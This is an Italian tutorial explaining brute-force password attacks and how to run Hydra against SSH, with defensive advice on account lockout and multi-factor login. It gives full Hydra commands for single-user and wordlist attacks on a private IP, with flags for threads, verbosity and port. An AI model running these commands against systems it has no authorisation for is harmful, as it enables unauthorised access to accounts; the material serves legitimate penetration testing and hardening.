Brute Force Attack ? Utilizziamo Hydra per testatre i nostri servizi.

Brute Force With Hydra

Cosa è Hydra ?  Hydra è uno strumento ben conosciuto con il quale è possibile  lanciare attacchi a “forza bruta” brute-force su credenziali di accesso per diversi protocolli.

Come funziona HYDRA?

Hydra è uno strumento di cracking delle password ed utilizza la forza bruta. Il  password cracking è la metodologia di “indovinare” le password di accesso a sistemi o servizi informatici. Un approccio comune è l’approccio utilizzato da Hydra e da molti altri strumenti e programmi simili di pentesting che sono chiamati di Brute Force.

Forza bruta significa che il programma lancia un’implacabile raffica di password al login per indovinarla. Come sappiamo, la maggior parte degli utenti ha password deboli e troppo spesso sono facilmente intuibili. Un po’ di social engineering e le possibilità di trovare la password corretta per un utente si moltiplicano. La maggior parte delle persone (specialmente quelle non esperte di informatica, baseranno la loro password “segreta” su parole e sostantivi che non dimenticheranno facilmente. Queste parole sono comuni: persone care, nomi di bambini, indirizzi, strade, squadra di calcio preferita, luogo di nascita, ecc. Tutto questo si ottiene facilmente attraverso i social media, così non appena l’hacker ha compilato questi dati può essere compilato all’interno di una “lista di password”.



 

Come difendersi

Ci sono diversi modi in cui un amministratore di sistema o un ingegnere di rete può difendersi dagli attacchi di forza bruta.

Tra i più semplici troviamo quello di disattivare o bloccare l’accesso agli account quando un numero predeterminato di tentativi di autenticazione non riusciti è stato raggiunto. Si potrebbe considerare l’utilizzo del multi-factor o il doppio opt-in/login per gli utenti. Implementare token di sicurezza basati su hardware al posto delle password a livello di sistema e imporre a tutti i dipendenti l’obbligo di utilizzare le password contenenti simboli lettere e numeri.

Hydra

L’utility Hydra ha la possibilità di ” attaccare ”  i login su una varietà di protocolli differenti , ma in questo caso, andremo a testare la resistenza delle password su SSH.

Hydra supporta: PC-NFS, POP3, PostgreSQL, RDP, Rexec, Rlogin, Rsh,Cisco AAA, Cisco auth, SOCKS5, SSH (v1 and v2), SSHKEY, Subversion, Teamspeak (TS2), Cisco enable, Oracle Listener, Oracle SID, PC-Anywhere,  SIP, SMB(NT)CVS, FTP, HTTP(S)-FORM-GET, HTTP(S)-FORM-POST, HTTP(S)-GET, HTTP(S)-HEAD, HTTP-Proxy, ICQ, IMAP, IRC, LDAP, MS-SQL, MySQL, NNTP, , SMTP, SMTP Enum, SNMP v1+v2+v3, Telnet, VMware-Auth, VNC and XMPP.

Attenzione: Hydra è uno strumento che che può essere usato  per attaccare.

Si può utilizzare liberamente solo per testare i propri sistemi e in casi di PenTesting! In caso contrario, è illegale!

SSH è presente sulla quasi totalità dei  server Linux o Unix e di solito è il modo principale per gli  amministratori per accedere e gestire i loro sistemi. In questo articolo parlerò di utilizzo di wordlists   “lista di parole”  da fornire a Hydra con le password da testare.  Con le WordList andremo ad effettuare un attacco mirato con un numero definito di parole che comporta una diminuzione della percentuale di riuscita , ma crea sia quel flusso di rete che un alto numero di tentativi di accesso da poter utilizzare per rendere sicuro il nostro server con contromisure attive.



 

Hydra
Hydra Brute Force Attack

Attenzione: Hydra è uno strumento che che può essere usato  per attaccare.

Si può utilizzare liberamente solo per testare i propri sistemi e in casi di PenTesting! In caso contrario, è illegale!



 

Test : Singolo utente root il protocollo ssh del server 192.168.1.1 con lista presente in /usr/share/lista/password.txt

Comando:

hydra -l root -P /usr/share/lista/password.txt 192.168.1.1 -t 4 ssh

-l  = parametro che va ad identificare Utente Singolo  ( in questo caso root)

root = variabile , si va a identificare username da attaccare

-P = parametro che va ad identificare un attacco con lista

/usr/share/lista/password.txt = identificazione vocabolario

192.168.1.1 Indirizzo ip del server da attaccare

-t  = parametro che indica a Idra il numero di thread da utilizzare  ( nel nostro caso 4 come suggerisce il manuale di Idra per attacco a ssh)

ssh = Protocollo da attaccare

2) Andiamo a testare con utenti multipli prelevati da /usr/share/lista/utenti.txt  il protocollo ssh del server 192.168.1.1 con lista presente in /usr/share/lista/password.txt



 

Comando:

hydra -L /usr/share/lista/utenti.txt -P /usr/share/lista/password.txt 192.168.1.1 -t 4 ssh

-L  = lista utenti (L maiuscola)

/usr/share/lista/utenti.txt = identificazione vocabolario

-P = parametro che va ad identificare un attacco con lista

/usr/share/lista/password.txt = identificazione vocabolario

192.168.1.1 Indirizzo ip del server da attaccare

-t  = parametro che indica a Idra il numero di thread da utilizzare  ( nel nostro caso 4 come suggerisce il manuale di Idra per attacco a ssh)

ssh = Protocollo da attaccare

Altri parametri.

 -V  or -v

il parametro -V controlla il livello di dettaglio in output di quello che Hydra sta facendo. -V altissimo dettaglio -v medio dettaglio

hydra -l root -P /usr/share/lista/password.txt 192.168.1.1 -t 4 -V ssh

hydra -l root -P /usr/share/lista/password.txt 192.168.1.1 -t 4 -v ssh

-s

Non e’ detto che un determinato protocollo sia su una porta standard. Molti cambiano le porte per aumentare il livello di sicurezza. Con questo parametro possiamo dire su che porta tentare per il protocollo specificato.

Esempio:

hydra -s 44 -L /usr/share/lista/utenti.txt -P /usr/share/lista/password.txt 192.168.1.1 -t 4 ssh

p.s.

quindi se tentate su uno dei server che gestisco, al quarto tentativo l’ip attaccante verrà bannato per 15 minuti. Quindi, esiste sempre un metodo per difendersi o almeno tentare di farlo. Basta conoscerlo.

Key : hydra brute force , hydra brute force attack , come usare hydra, hydra password brute force , hydra brute force web login ,hydra password attack